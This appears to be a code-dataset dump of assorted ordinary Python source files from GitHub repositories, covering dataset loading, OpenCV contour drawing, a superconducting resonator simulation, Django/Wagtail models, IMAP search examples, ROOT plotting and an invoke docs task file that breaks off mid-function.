seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
15130917408 | # %%
# Notebook-style smoke test: load the "small" ekonspacing dataset splits
# through the local loading script and print one example from each split.
from pprint import pprint
from datasets import load_dataset

# Pre-built small train/validation/test text files (relative to this script).
test_file = "../data/ekonspacing/test_small.txt"
val_file = "../data/ekonspacing/val_small.txt"
train_file = "../data/ekonspacing/train_small.txt"
# %%
# force_redownload ensures cached copies are not reused between runs.
dataset = load_dataset(
    "ekonspacing.py",
    name="small",
    data_files={"train": str(train_file), "validation": str(val_file), "test": str(test_file)},
    download_mode="force_redownload",
)
print(dataset)
# %%
pprint(dataset["train"][0])
pprint(dataset["test"][0])
# %%
| entelecheia/transformer-datasets | datasets/ekonspacing/ekonspacing_test.py | ekonspacing_test.py | py | 500 | python | en | code | 0 | github-code | 36 |
17079442964 | import logging
from .html import extract_html_text
from .pdf import extract_pdf_text
logger = logging.getLogger(__name__)


def extract_text(file_path: str) -> str:
    """Extract the text content of *file_path* (HTML or PDF).

    Any failure — unsupported extension, parser error, missing file — is
    logged as a warning and swallowed, so the function always returns a
    string and can be used in a pipeline.

    :param file_path: path to the file to extract.
    :return: extracted text, or '' on any failure.
    """
    try:
        if file_path.endswith('.html'):
            return extract_html_text(file_path)
        if file_path.endswith('.pdf'):
            return extract_pdf_text(file_path)
        raise ValueError(f'Unknown file type {file_path}')
    except Exception as an_exception:  # pylint: disable=W0718
        # Lazy %-style args: the message is only formatted if the record
        # is actually emitted.
        logger.warning('Failed to extract %s: %s', file_path, an_exception)
        return ''  # don't return None or else you can't pipeline this
| amy-langley/tracking-trans-hate-bills | lib/util/misc.py | misc.py | py | 691 | python | en | code | 2 | github-code | 36 |
22926496902 | import cv2
import math
# Source: https://richardpricejones.medium.com/drawing-a-rectangle-with-a-angle-using-opencv-c9284eae3380
# Made slight adjustments to color
# BGR colors for the supported names; anything else falls back to magenta.
_RECT_COLORS = {'green': (0, 255, 0), 'red': (0, 0, 255)}


def draw_angled_rec(x0, y0, width, height, angle, img, color):
    """Draw a rotated rectangle outline onto *img* in place.

    Source: https://richardpricejones.medium.com/drawing-a-rectangle-with-a-angle-using-opencv-c9284eae3380
    (slight adjustments made to color handling).

    :param x0: x of the rectangle center.
    :param y0: y of the rectangle center.
    :param width: side length in pixels.
    :param height: side length in pixels.
    :param angle: rotation in degrees.
    :param img: image (numpy array) drawn on in place.
    :param color: 'green', 'red', or anything else for magenta.
    """
    _angle = angle * math.pi / 180.0
    b = math.cos(_angle) * 0.5
    a = math.sin(_angle) * 0.5
    # Two adjacent corners; the other two are their point reflections
    # through the center (x0, y0).
    pt0 = (int(x0 - a * height - b * width),
           int(y0 + b * height - a * width))
    pt1 = (int(x0 + a * height - b * width),
           int(y0 - b * height - a * width))
    pt2 = (int(2 * x0 - pt0[0]), int(2 * y0 - pt0[1]))
    pt3 = (int(2 * x0 - pt1[0]), int(2 * y0 - pt1[1]))
    bgr = _RECT_COLORS.get(color, (255, 0, 255))
    # One loop over the four edges instead of repeating the block per color.
    for start, end in ((pt0, pt1), (pt1, pt2), (pt2, pt3), (pt3, pt0)):
        cv2.line(img, start, end, bgr, 5)
# Demo: threshold the test image, find contours, and draw/annotate the
# min-area (rotated) rectangle of each first-level contour.
img = cv2.imread('minAreaRect_Test.png')
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(img_gray, 150, 255, cv2.THRESH_BINARY)
# detect the contours on the binary image using cv2.CHAIN_APPROX_NONE
contours, hierarchy = cv2.findContours(image=thresh, mode=cv2.RETR_TREE, method=cv2.CHAIN_APPROX_NONE)
# Size/shape thresholds — currently unused, presumably kept for future
# filtering of candidate rectangles.
slender_rat = 3
min_width = 10
max_width = 120
min_len = 120
first = 1
image_copy = img.copy()
cv2.imwrite('minAreaRect_Test_Result.png',image_copy)
# cv2.drawContours(image=image_copy, contours=contours, contourIdx=-1, color=(0, 255, 0), thickness=2, lineType=cv2.LINE_AA)
# Used to add text on pattern
counter = 0
for cnt in contours:
    if counter == 0: # First contour encompasses entire image
        counter += 1
        continue
    heir = hierarchy[0][counter][3] # [next, previous, first child, parent].
    if heir == 0:
        # Direct children of the outermost contour: fit a rotated rectangle.
        rect = cv2.minAreaRect(cnt)
        x = int(rect[0][0])
        y = int(rect[0][1])
        w = int(rect[1][0])
        h = int(rect[1][1])
        theta = int(rect[2])
        draw_angled_rec(x, y, w, h, theta, image_copy, 'green')
        # Annotate each rectangle with its angle, width and height.
        image_tmp = cv2.putText(img=image_copy, text=str(theta)+'[deg]', org=(x, y), fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=3, color=(0,0,0), thickness=5)
        image_tmp = cv2.putText(img=image_copy, text='w='+str(w), org=(x, y+100), fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=3, color=(0,0,0), thickness=5)
        image_tmp = cv2.putText(img=image_copy, text='h='+str(h), org=(x, y+200), fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=3, color=(0,0,0), thickness=5)
        cv2.imwrite('minAreaRect_Test_Result.png',image_copy)
    counter += 1
13987393028 | from sys import maxsize as maxint
class Solution:
    def minSubArrayLen(self, s, nums):
        """Return the length of the shortest contiguous subarray of *nums*
        whose sum is >= *s*, or 0 if no such subarray exists."""
        best = maxint
        window_sum = 0
        left = 0
        for right, value in enumerate(nums):
            window_sum += value
            # Shrink the window from the left while it still satisfies the
            # target, recording the smallest length seen.
            while window_sum >= s:
                best = min(best, right - left + 1)
                window_sum -= nums[left]
                left += 1
        return 0 if best == maxint else best
| dariomx/topcoder-srm | leetcode/first-pass/facebook/minimum-size-subarray-sum/Solution.py | Solution.py | py | 485 | python | en | code | 0 | github-code | 36 |
521538009 | #imports
import numpy as np
import matplotlib.pyplot as plt
import scipy.constants as const
from scipy.special import iv as I0
from scipy.special import kv as K0
#Global simulation constants (SI units)
L_geo = 55.6e-9  # geometric inductance [H]
Z0 = 50.0  # feedline characteristic impedance [Ohm]
F0_base = 0.95e9 #resonance frequency at the lowest temperature [Hz]
squares= 27223  # number of squares of the inductor film
c_couple = 1.5e-14  # coupling capacitance [F]
TC = 1.5  # superconducting critical temperature [K]
Delta_0 = (3.5*const.Boltzmann*TC)/2  # zero-temperature gap energy (BCS 3.5 kB Tc / 2) [J]
sigma_n = 6.0e7 # normal-state conductivity of the superconducting film [S/m]
Thick = 20e-9 # thickness of the superconducting film [m]
w = 2 * np.pi * F0_base  # angular resonance frequency [rad/s]
me = const.m_e  # electron mass (not used below)
miu_0 = 4*np.pi*10**-7  # vacuum permeability [H/m]
pi = np.pi
#Main code
def main():
    """Simulate the KID response over a temperature range and produce four
    plots: S21 amplitude, Q-vs-I, F0-vs-temperature, and the dF0
    'magic formula' comparison."""
    #Define temperature range (step 0.1 K)
    step = 0.1
    temp = np.arange(0.2, 0.3 , step)
    #Find sigma1 and sigma 2 and the internal inductance for each temperature
    sigma1, sigma2 = find_sigma1_sigma2(sigma_n ,Thick, TC, Delta_0, w, temp)
    Lint = find_Lint_square(Thick, w, sigma2) * squares
    #Kinetic inductance per square
    Lk = find_lk(Thick, w, sigma2)
    #Effective series resistance from the sigma1/sigma2 loss ratio
    sigma12Ratio = sigma1/sigma2
    Res = Lk*w*sigma12Ratio *squares
    #IDC chosen so the lowest-temperature device resonates at w
    Ltot_lowest = Lint[0] + L_geo
    IDC = find_IDC(w, Ltot_lowest, c_couple)
    #Sweep S21 for each temperature
    Sweep_points = 20000
    BW = 5e6
    I_raw = np.zeros((Sweep_points, len(temp)), dtype="float")
    Q_raw = np.copy(I_raw)
    Phase = np.copy(Q_raw)
    S21_Volt = np.copy(I_raw)
    for i in range(0, len(Lint)):
        Sweep, S21_Volt[:,i], Phase[:,i], I_raw[:,i], Q_raw[:,i],_,_,_,_,_ = Capacitive_Res_Sim(F0_base, c_couple, Z0, L_geo, Lint[i], Res[i], BW, Sweep_points, IDC)
        plt.plot(Sweep/1e9, S21_Volt[:,i], label=str("{:.2f}".format(temp[i])))
    #Graph labels and title
    plt.legend(loc='center left', bbox_to_anchor=(1, 0.5), fancybox=True, title="Temperature / K")
    plt.xlabel('Frequency / GHz', fontsize=13)
    plt.ylabel('Output Amplitude', fontsize=13)
    #plt.title("S21 Amplitude For Varying Temperatures")
    plt.xlim(0.9490, 0.9505)
    plt.locator_params(nbins=6)
    plt.savefig("S21 Plot with Resistance")
    plt.rcParams['figure.dpi'] = 300
    plt.figure()
    #Q vs I plots
    for i in range(0, len(Lint)):
        plt.plot(I_raw[:,i], Q_raw[:,i], linewidth=1,label=str("{:.2f}".format(temp[i])))
    #Minimum S21 at lowest temp
    S21_Base = min(S21_Volt[:,0])
    I_Base = np.zeros(len(temp), dtype="float")
    Q_Base = np.copy(I_Base)
    #Obtain F0_Base (frequency of the S21 minimum) for the lowest temperature
    for i in range(0, len(S21_Volt[:,0])):
        if S21_Base == S21_Volt[i,0]:
            F0_Base = Sweep[i]
    #Mark the I/Q values at F0_Base for every temperature
    for i in range(0, len(temp)):
        for j in range(0, len(Sweep)):
            if F0_Base == Sweep[j]:
                I_Base[i] = I_raw[j,i]
                Q_Base[i] = Q_raw[j,i]
                plt.plot(I_Base[i], Q_Base[i], markersize=4, marker="x", color='black')
    #labels
    plt.legend(loc='center left', bbox_to_anchor=(1, 0.5), fancybox=True, title="Temperature / K")
    plt.xlabel('I / V', fontsize=13)
    plt.ylabel('Q / V', fontsize=13)
    #plt.title("Q vs I Plot for Varying Temperature")
    plt.savefig("Q vs I plot for varying temp")
    plt.figure()
    #Finding F0 (S21 minimum) for the different temperatures
    F0 = np.zeros(len(temp))
    for i in range(0, len(temp)):
        S21_min = min(S21_Volt[:,i])
        for j in range(0, len(Sweep)):
            if S21_min == S21_Volt[j,i]:
                F0[i] = Sweep[j]
    #Plotting F0 vs Temp
    plt.plot(temp, F0/1e9, color='k', linewidth="1", label="Minimum Of S21")
    plt.xlabel('Temperature / K', fontsize=13)
    plt.ylabel('F0 / GHz', fontsize=13)
    plt.rcParams['figure.dpi'] = 300
    #plt.title("F0 vs Temperature")
    #Finding dI/dF and dQ/dF for lowest temperature
    #Using central numerical derivatives at F0_Base
    # NOTE: this rebinds 'step' from the temperature step to the frequency step.
    step = abs((Sweep[0]-Sweep[-1])/Sweep_points)
    for i in range(0, len(Sweep)):
        if Sweep[i] == F0_Base:
            didf = (I_raw[i+1,0] - I_raw[i-1,0])/(2*step)
            dqdf = (Q_raw[i+1,0] - Q_raw[i-1,0])/(2*step)
    #Use Magic Formula to estimate the frequency shift from the I/Q shift
    di = np.zeros(len(temp))
    dq = np.copy(di)
    di = abs(I_Base - I_Base[0])
    dq = abs(Q_Base - Q_Base[0])
    dF0 = Magic_Formula(di, dq, didf, dqdf)
    #Find F0 for different temp from the estimated shift
    F0_Magic = F0_Base - abs(dF0)
    plt.plot(temp, F0_Magic/1e9, label="dF0 Formula")
    plt.legend(loc='center left', bbox_to_anchor=(1, 0.5), fancybox=True)
    plt.ticklabel_format(useOffset=False)
    plt.rcParams['figure.dpi'] = 1000
    plt.xlim(0.20, 0.22)
    plt.ylim(0.949980, 0.95)
    plt.savefig("Magic Formula plot")
#KID Simulating Function
def Capacitive_Res_Sim(F0, C_couple, Z0, L_geo, L_int, Res, Sweep_BW, Sweep_points, Capacitance):
    """Simulate the S21 transmission of a capacitively coupled lossy LC
    resonator over a frequency sweep.

    Sweeps ``Sweep_points`` frequencies across ``Sweep_BW`` centred on
    ``F0`` and returns the tuple
    (Sweep, S21_Volt, Phase, I_raw, Q_raw, I_cent, Q_cent, QU, QL, I_offset).
    """
    j=complex(0,1)
    Cc=C_couple
    F_min=F0-(Sweep_BW/2.0)
    F_max=F0+(Sweep_BW/2.0)
    Sweep=np.linspace(F_min, F_max, Sweep_points)
    W=Sweep*2.0*pi
    W0=2.0*pi*F0
    L=L_geo+L_int
    C=Capacitance
    Zres= 1.0/((1./((j*W*L)+Res))+(j*W*C)) # Impedance of resonator section
    Zc=1.0/(j*W*Cc) #impedance of coupler
    ZT=Zres+Zc
    YT=1.0/ZT
    S21 = 2.0/(2.0+(YT*Z0))  # shunt-resonator transmission on a Z0 line
    I_raw=S21.real
    Q_raw=S21.imag
    # Centre I on the midpoint of the resonance dip; Q is left unchanged.
    shift=((1.0-min(I_raw))/2.0)+min(I_raw)
    I_cent=I_raw-shift
    Q_cent=Q_raw
    Phase=Atan(abs(Q_cent/I_cent))
    QU=(W0*L)/Res  # unloaded quality factor (w0 L / R)
    QL=(C*2)/(W0*(Cc**2)*Z0)  # presumably the coupling-limited Q — confirm
    S21_Volt=abs(S21)
    I_offset=shift
    return (Sweep, S21_Volt, Phase, I_raw, Q_raw, I_cent, Q_cent, QU, QL, I_offset)
#Function to find sigma1 and sigma2
def find_sigma1_sigma2(sigma_n ,Thick, TC, Delta_0, w, T):
#An interpolation formula for delta_T
delta_T = Delta_0*np.tanh(1.74*np.sqrt((TC/T)-1))
#Define constants to simplify eqn
multiplying_constant = delta_T/(const.hbar * w)
e_const_1 = - Delta_0/(const.Boltzmann*T)
e_const_2 = (const.hbar*w)/(2*const.Boltzmann*T)
#Parts of the sigma1 Ratio
A = 2*multiplying_constant
B = np.exp(e_const_1)
C = K0(0, e_const_2)
D = 2*(np.sinh(e_const_2))
#Find Sigma 1 and Sigma 2
sigma1Ratio = A * B * C * D
sigma2Ratio = np.pi*multiplying_constant*(1 - (2*np.exp(e_const_1)*np.exp(-e_const_2)*I0(0,e_const_2)))
sigma2 = sigma2Ratio * sigma_n
sigma1 = sigma1Ratio * sigma_n
return sigma1, sigma2
def find_lk(Thick, w, sigma2):
    """Kinetic inductance per square of the film, including the thin-film
    thickness correction."""
    # Effective penetration depth derived from sigma2.
    Lambda_T_MB = (1/(miu_0*sigma2*w))**0.5
    ratio = Thick/(2*Lambda_T_MB)
    # lk = (mu0 * lambda / 4) * (coth(t/2L) + (t/2L) * csch(t/2L)^2)
    return (miu_0*Lambda_T_MB)/4*(coth(ratio)+ratio*(csch(ratio))**2)
def find_Lint_square(Thick, w, sigma2):
    """Internal inductance per square of the superconducting film."""
    # Effective penetration depth derived from sigma2.
    Lambda_T_MB = (1/(miu_0*sigma2*w))**0.5
    half_thickness_ratio = Thick/(2*Lambda_T_MB)
    return (miu_0*Lambda_T_MB/2)*coth(half_thickness_ratio)
#Hyperbolic/trig helpers used by the inductance and phase formulas
def coth(x):
    """Hyperbolic cotangent (element-wise for numpy arrays)."""
    return np.cosh(x)/np.sinh(x)
def csch(x):
    """Hyperbolic cosecant (element-wise for numpy arrays)."""
    return 1/np.sinh(x)
def Atan(x):
    """Arctangent wrapper (element-wise for numpy arrays)."""
    return np.arctan(x)
#Capacitance needed to resonate at w0 given the total inductance
def find_IDC(w0, Ltot, Cc):
    """Return the IDC capacitance that places the resonance at ``w0``,
    accounting for the coupling capacitance ``Cc``."""
    resonant_capacitance = 1/((w0**2)*Ltot)
    return resonant_capacitance - Cc
def Magic_Formula(di, dq, didf, dqdf):
    """Project the (dI, dQ) shift onto the frequency axis using the local
    derivatives, giving the estimated frequency shift dF0."""
    numerator = di*didf + dq*dqdf
    denominator = didf**2 + dqdf**2
    return numerator/denominator
main() | Ashleyyyt/Characterizing-KIDs | Simulate KID.py | Simulate KID.py | py | 7,177 | python | en | code | 0 | github-code | 36 |
29290663147 | from django.db import models
from wagtail.admin.edit_handlers import MultiFieldPanel, RichTextFieldPanel, StreamFieldPanel
from wagtail.core.fields import RichTextField, StreamField
from wagtail.snippets.models import register_snippet
from ..modules import text_processing
from .. import configurations
from ..blogs.blocks import SectionBlock
@register_snippet
class BlogPost(models.Model):
    """A blog post snippet: title, summary, optional introduction and
    conclusion, plus a stream of titled sections."""

    # Title rendered without any rich-text features (plain container).
    post_title = RichTextField(
        features=[], blank=False, null=True,
    )
    post_summary = RichTextField(
        features=configurations.RICHTEXT_FEATURES, blank=False, null=True,
    )
    post_introduction = RichTextField(
        features=configurations.RICHTEXT_FEATURES, blank=True, null=True,
    )
    post_conclusion = RichTextField(
        features=configurations.RICHTEXT_FEATURES, blank=True, null=True,
    )
    sections = StreamField(
        [
            ('section', SectionBlock()),
        ], blank=False
    )
    panels = [
        MultiFieldPanel(
            [
                RichTextFieldPanel('post_title'),
                RichTextFieldPanel('post_summary'),
                RichTextFieldPanel('post_introduction'),
                StreamFieldPanel('sections'),
                RichTextFieldPanel('post_conclusion'),
            ], heading='Post Content'
        ),
    ]

    @property
    def sections_with_title(self):
        """Return only the stream sections whose 'title' value is truthy."""
        return [section for section in self.sections if section.value['title']]

    def __str__(self):
        # Strip the HTML markup so admin listings show plain text.
        return text_processing.html_to_str(
            self.post_title
        )
| VahediRepositories/AllDota | dotahub/home/blogs/models.py | models.py | py | 1,626 | python | en | code | 0 | github-code | 36 |
7182836122 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @Author: José Sánchez-Gallego (gallegoj@uw.edu)
# @Date: 2023-01-19
# @Filename: test_callback.py
# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)
import unittest.mock
import click
from click.testing import CliRunner
from unclick.core import build_command_string
# Fixture command exercised by the round-trip tests below: one required
# string argument, one optional int argument, and a boolean flag.
@click.command()
@click.argument("ARG1", type=str)
@click.argument("ARG2", type=int, required=False)
@click.option("--flag1", "-f", is_flag=True, help="A flag.")
def my_command1(*args, **kwrgs):
    """Test command."""
    return
def _command_invoke(command: click.Command, string: str):
    """Invoke *command* with *string* (minus the leading command name) and
    return the mocked callback so the caller can inspect its arguments."""
    argv = string[len(command.name or "") :]
    with unittest.mock.patch.object(command, "callback") as mock_callback:
        outcome = CliRunner().invoke(command, argv)
        assert outcome.exit_code == 0
        mock_callback.assert_called()
        return mock_callback
def test_callback():
    """Both arguments and the flag survive the round trip."""
    cmd = build_command_string(my_command1, "hi", 2, flag1=True)
    callback = _command_invoke(my_command1, cmd)
    callback.assert_called_once_with(arg1="hi", arg2=2, flag1=True)


def test_callback2():
    """Omitted optional argument and flag fall back to their defaults."""
    cmd = build_command_string(my_command1, "hi")
    callback = _command_invoke(my_command1, cmd)
    callback.assert_called_once_with(arg1="hi", arg2=None, flag1=False)


def test_callback_string_with_spaces():
    """A multi-word string argument is kept as a single value."""
    cmd = build_command_string(my_command1, "hi how are you")
    callback = _command_invoke(my_command1, cmd)
    callback.assert_called_once_with(arg1="hi how are you", arg2=None, flag1=False)
| albireox/unclick | tests/test_callback.py | test_callback.py | py | 1,732 | python | en | code | 0 | github-code | 36 |
22502725218 | # -*- coding: utf-8 -*-
__docformat__ = "restructuredtext en"
"""
the PLUGIN extend
File: app_plugin_ext.py
Copyright: Blink AG
Author: Steffen Kube <steffen@blink-dx.com>
"""
from blinkdms.code.lib.oTASK import oTASK
from blinkdms.code.lib.main_imports import *
from blinkdms.code.lib.obj import table_obj_chk
class gPlugin_ext:
    """Plugin extension hooks: left-frame metadata, open-task counter and
    table/object access checks for the admin area."""

    def __init__(self, _html, infoarr, mod_is_adm_space):
        self._html = _html
        self.infoarr = infoarr
        self._mod_is_adm_space = mod_is_adm_space

    def html_left(self, db_obj):
        '''
        Populate the left HTML frame with the object update history.

        TBD: not implemented yet; kept as a hook for later.
        '''
        pass

    def task_info(self, db_obj):
        '''
        Expose the number of open tasks of the logged-in user as HTML meta
        data ('task.num'). Does nothing when no user is logged in.
        '''
        if not session.get('loggedin', 0):
            return
        task_lib = oTASK.UserTask(session['sesssec']['user_id'])
        num = task_lib.getNumOpenTasks(db_obj)
        self._html.add_meta('task.num', num)

    def post_actions(self, db_obj):
        '''Hooks executed after the main request handling.'''
        self.task_info(db_obj)

    def set_object(self, tablename, objid):
        '''Remember the table/object that sec_check_obj() should verify.'''
        self.tablename = tablename
        self.objid = objid

    def sec_check_obj(self, db_obj):
        '''
        Run TABLE and OBJECT access checks for the object registered via
        set_object(); do_tab_obj_access_chk raises on denied access.
        Only enforced inside the admin area.
        '''
        if not self._mod_is_adm_space:  # if not in the ADMIN-Area
            return
        tablename = self.tablename
        # Default required actions; callers may override them through
        # infoarr['objtab.acc_check'].
        act = {
            'tab': ['read'],
            'obj': ['read']
        }
        if len(self.infoarr.get('objtab.acc_check', {})):
            act = self.infoarr['objtab.acc_check']
        table_obj_chk.do_tab_obj_access_chk(db_obj, tablename, self.objid, act)
| qbicode/blinkdms | blinkdms/code/lib/app_plugin_ext.py | app_plugin_ext.py | py | 2,218 | python | en | code | 0 | github-code | 36 |
27549684390 | """
Query builder examples.
NOTES:
# Infix notation (natural to humans)
NOT ((FROM='11' OR TO="22" OR TEXT="33") AND CC="44" AND BCC="55")
# Prefix notation (Polish notation, IMAP version)
NOT (((OR OR FROM "11" TO "22" TEXT "33") CC "44" BCC "55"))
# Python query builder
NOT(AND(OR(from_='11', to='22', text='33'), cc='44', bcc='55'))
# python to prefix notation steps:
1. OR(1=11, 2=22, 3=33) ->
"(OR OR FROM "11" TO "22" TEXT "33")"
2. AND("(OR OR FROM "11" TO "22" TEXT "33")", cc='44', bcc='55') ->
"AND(OR(from_='11', to='22', text='33'), cc='44', bcc='55')"
3. NOT("AND(OR(from_='11', to='22', text='33'), cc='44', bcc='55')") ->
"NOT (((OR OR FROM "1" TO "22" TEXT "33") CC "44" BCC "55"))"
"""
import datetime as dt
from imap_tools import AND, OR, NOT, A, H, U

# Each statement builds a query object; the comment below it shows the IMAP
# search string the object renders to.

# date in the date list (date=date1 OR date=date3 OR date=date2)
q1 = OR(date=[dt.date(2019, 10, 1), dt.date(2019, 10, 10), dt.date(2019, 10, 15)])
# '(OR OR ON 1-Oct-2019 ON 10-Oct-2019 ON 15-Oct-2019)'
# date not in the date list (NOT(date=date1 OR date=date3 OR date=date2))
q2 = NOT(OR(date=[dt.date(2019, 10, 1), dt.date(2019, 10, 10), dt.date(2019, 10, 15)]))
# 'NOT ((OR OR ON 1-Oct-2019 ON 10-Oct-2019 ON 15-Oct-2019))'
# subject contains "hello" AND date greater than or equal dt.date(2019, 10, 10)
q3 = A(subject='hello', date_gte=dt.date(2019, 10, 10))
# '(SUBJECT "hello" SINCE 10-Oct-2019)'
# from contains one of the address parts
q4 = OR(from_=["@spam.ru", "@tricky-spam.ru"])
# '(OR FROM "@spam.ru" FROM "@tricky-spam.ru")'
# marked as seen and not flagged
q5 = AND(seen=True, flagged=False)
# '(SEEN UNFLAGGED)'
# (text contains tag15 AND subject contains tag15) OR (text contains tag10 AND subject contains tag10)
q6 = OR(AND(text='tag15', subject='tag15'), AND(text='tag10', subject='tag10'))
# '(OR (TEXT "tag15" SUBJECT "tag15") (TEXT "tag10" SUBJECT "tag10"))'
# (text contains tag15 OR subject contains tag15) OR (text contains tag10 OR subject contains tag10)
q7 = OR(OR(text='tag15', subject='tag15'), OR(text='tag10', subject='tag10'))
# '(OR (OR TEXT "tag15" SUBJECT "tag15") (OR TEXT "tag10" SUBJECT "tag10"))'
# header IsSpam contains '++' AND header CheckAntivirus contains '-'
q8 = A(header=[H('IsSpam', '++'), H('CheckAntivirus', '-')])
# '(HEADER "IsSpam" "++" HEADER "CheckAntivirus" "-")'
# UID range
q9 = A(uid=U('1034', '*'))
# '(UID 1034:*)'
# complex from README
q10 = A(OR(from_='from@ya.ru', text='"the text"'), NOT(OR(A(answered=False), A(new=True))), to='to@ya.ru')
# '((OR FROM "from@ya.ru" TEXT "\\"the text\\"") NOT ((OR (UNANSWERED) (NEW))) TO "to@ya.ru")'
| ikvk/imap_tools | examples/search.py | search.py | py | 2,613 | python | en | code | 608 | github-code | 36 |
17232377687 | import numpy as np
import json
import CMS_lumi
import os
import copy
import ROOT
def main():
    """Plot the goodness-of-fit (saturated) test-statistic distribution from
    toys, overlay the observed value, and report the p-value."""
    #work_dir = "."
    #plots_dir = "."
    ROOT.gROOT.SetBatch()
    ROOT.gStyle.SetOptStat(0000)
    ROOT.gStyle.SetPalette(ROOT.kVisibleSpectrum)
    file_obs = ROOT.TFile("higgsCombineTest.GoodnessOfFit.mH100.root","READ")
    file_toys = ROOT.TFile("higgsCombineTest.GoodnessOfFit.mH100.Toys.root","READ")
    # Branch buffers filled by SetBranchAddress/GetEntry below.
    limit_obs = np.zeros((1), dtype="float64")
    limit_toys = np.zeros((1), dtype="float64")
    m_h = np.zeros((1), dtype="float64")
    ########### Data #################
    tree_obs = file_obs.Get("limit")
    tree_obs.SetBranchAddress("limit",limit_obs)
    tree_obs.SetBranchAddress("mh",m_h)
    tree_obs.GetEntry(0)
    ########### Toys #################
    tree_toys = file_toys.Get("limit")
    tree_toys.SetBranchAddress("limit",limit_toys)
    #Histo =ROOT.TH1D("Histo","",40,(0.85)*tree_toys.GetMinimum("limit"),(0.95)*tree_toys.GetMaximum("limit"))
    Histo =ROOT.TH1D("Histo","",40,40,180)
    for iEvent in range(tree_toys.GetEntries()):
        tree_toys.GetEntry(iEvent)
        Histo.Fill(limit_toys,1.)
    # Normalize the toy distribution to unit area.
    Histo.Scale(1/Histo.Integral())
    # p-value = fraction of toys at or above the observed test statistic.
    bin_obs = Histo.GetXaxis().FindBin(limit_obs)
    p_value = Histo.Integral(bin_obs,Histo.GetNbinsX())
    print("p-value: " + str(p_value))
    canvas = ROOT.TCanvas("canvas","canvas",900,900)
    canvas.cd()
    canvas.SetTicks()
    canvas.SetLeftMargin(0.15)
    canvas.SetRightMargin(0.05)
    canvas.SetBottomMargin(0.13)
    Histo.GetYaxis().SetRangeUser(0.,1.6*Histo.GetMaximum())
    Histo.SetLineColor(ROOT.kSpring-8)
    Histo.SetLineWidth(1)
    Histo.SetLineStyle(1)
    Histo.SetFillColorAlpha(ROOT.kSpring-8,0.20)
    Histo.SetFillStyle(1001)
    Histo.GetYaxis().SetTitleOffset(1.5)
    Histo.GetYaxis().SetTitle("Normalized to unity")
    Histo.GetYaxis().SetTitleSize(0.038)
    Histo.GetYaxis().SetLabelSize(0.032)
    Histo.GetYaxis().SetTickLength(0.03)
    Histo.GetXaxis().SetLabelFont(42)
    Histo.GetXaxis().SetLabelSize(0.032)
    Histo.GetXaxis().SetTitleSize(0.038)
    Histo.GetXaxis().SetTitleOffset(1.3)
    Histo.GetXaxis().SetTitle("-2 ln #lambda (saturated)")
    Histo.GetXaxis().SetTickLength(0.03)
    # Red clone highlighting only the region above the observed value.
    Histo_PValue = Histo.Clone("Histo_PValue")
    Histo_PValue.SetLineColor(ROOT.kRed)
    Histo_PValue.SetLineWidth(0)
    Histo_PValue.SetFillColorAlpha(ROOT.kRed,0.40)
    # Arrow marking the observed test statistic on the x axis.
    arrow = ROOT.TArrow(Histo.GetBinLowEdge(bin_obs),0.002,Histo.GetBinLowEdge(bin_obs),0.4*Histo.GetBinContent(bin_obs),0.02,"<|")
    arrow.SetAngle(50)
    arrow.SetLineWidth(3)
    arrow.SetLineColor(ROOT.kRed)
    arrow.SetFillColorAlpha(ROOT.kRed,0.45)
    for iBin in range(Histo_PValue.GetXaxis().FindBin(limit_obs)):
        Histo_PValue.SetBinContent(iBin,0.)
    Histo.Draw("h")
    Histo_PValue.Draw("sameh")
    arrow.Draw()
    leg = ROOT.TLegend(0.55,0.55,0.9,0.75)
    leg.SetTextSize(0.035)
    leg.SetBorderSize(0)
    leg.AddEntry(arrow,"Observed","l")
    leg.AddEntry(Histo,"Expected (Toys)","lf")
    leg.Draw()
    Latex = ROOT.TLatex()
    Latex.SetNDC()
    Latex.SetTextColor(ROOT.kGray+2)
    Latex.SetTextSize(0.04)
    Latex.SetTextFont(12)
    Latex.DrawLatex(1-canvas.GetRightMargin()-0.75,1-canvas.GetTopMargin()-0.1,"Sig+Bkgd")
    Latex.DrawLatex(1-canvas.GetRightMargin()-0.75,1-canvas.GetTopMargin()-0.15,"p-value: " + str(round(p_value,3)))
    Latex.DrawLatex(canvas.GetLeftMargin()+0.01,1+0.02-canvas.GetTopMargin(),'#color[4]{SL}')
    CMS_lumi.CMS_lumi(canvas, 15, 3)
    canvas.Update()
    canvas.Print("GoF.pdf","Portrait pdf")
if __name__ == "__main__":
main()
| vshang/Limits | plot_gof.py | plot_gof.py | py | 3,697 | python | en | code | 0 | github-code | 36 |
15857685473 | # -*- coding: utf-8 -*-
import os
import sys
import webbrowser
from invoke import task
docs_dir = 'docs'
build_dir = os.path.join(docs_dir, '_build')
@task
def readme(ctx, browse=False):
    """Render README.rst to README.html; open it when *browse* is set."""
    ctx.run("rst2html.py README.rst > README.html")
    if browse:
        webbrowser.open_new_tab('README.html')


def build_docs(ctx, browse):
    """Run a one-off sphinx build, then optionally open the result."""
    ctx.run(f"sphinx-build {docs_dir} {build_dir}", echo=True)
    if browse:
        browse_docs(ctx)


@task
def clean_docs(ctx):
    """Delete the generated documentation tree."""
    ctx.run(f'rm -rf {build_dir}')


@task
def browse_docs(ctx):
    """Open the built docs index page in a new browser tab."""
    index_page = os.path.join(build_dir, 'index.html')
    webbrowser.open_new_tab(index_page)


@task
def docs(ctx, clean=False, browse=False, watch=False):
    """Build the docs."""
    if clean:
        clean_docs(ctx)
    builder = watch_docs if watch else build_docs
    builder(ctx, browse=browse)


@task
def watch_docs(ctx, browse=False, port=1234):
    """Rebuild the docs whenever a source file changes."""
    try:
        import sphinx_autobuild  # noqa
    except ImportError:
        print('ERROR: watch task requires the sphinx_autobuild package.')
        print('Install it with:')
        print(' pip install sphinx-autobuild')
        sys.exit(1)
    browser_flag = '--open-browser' if browse else ''
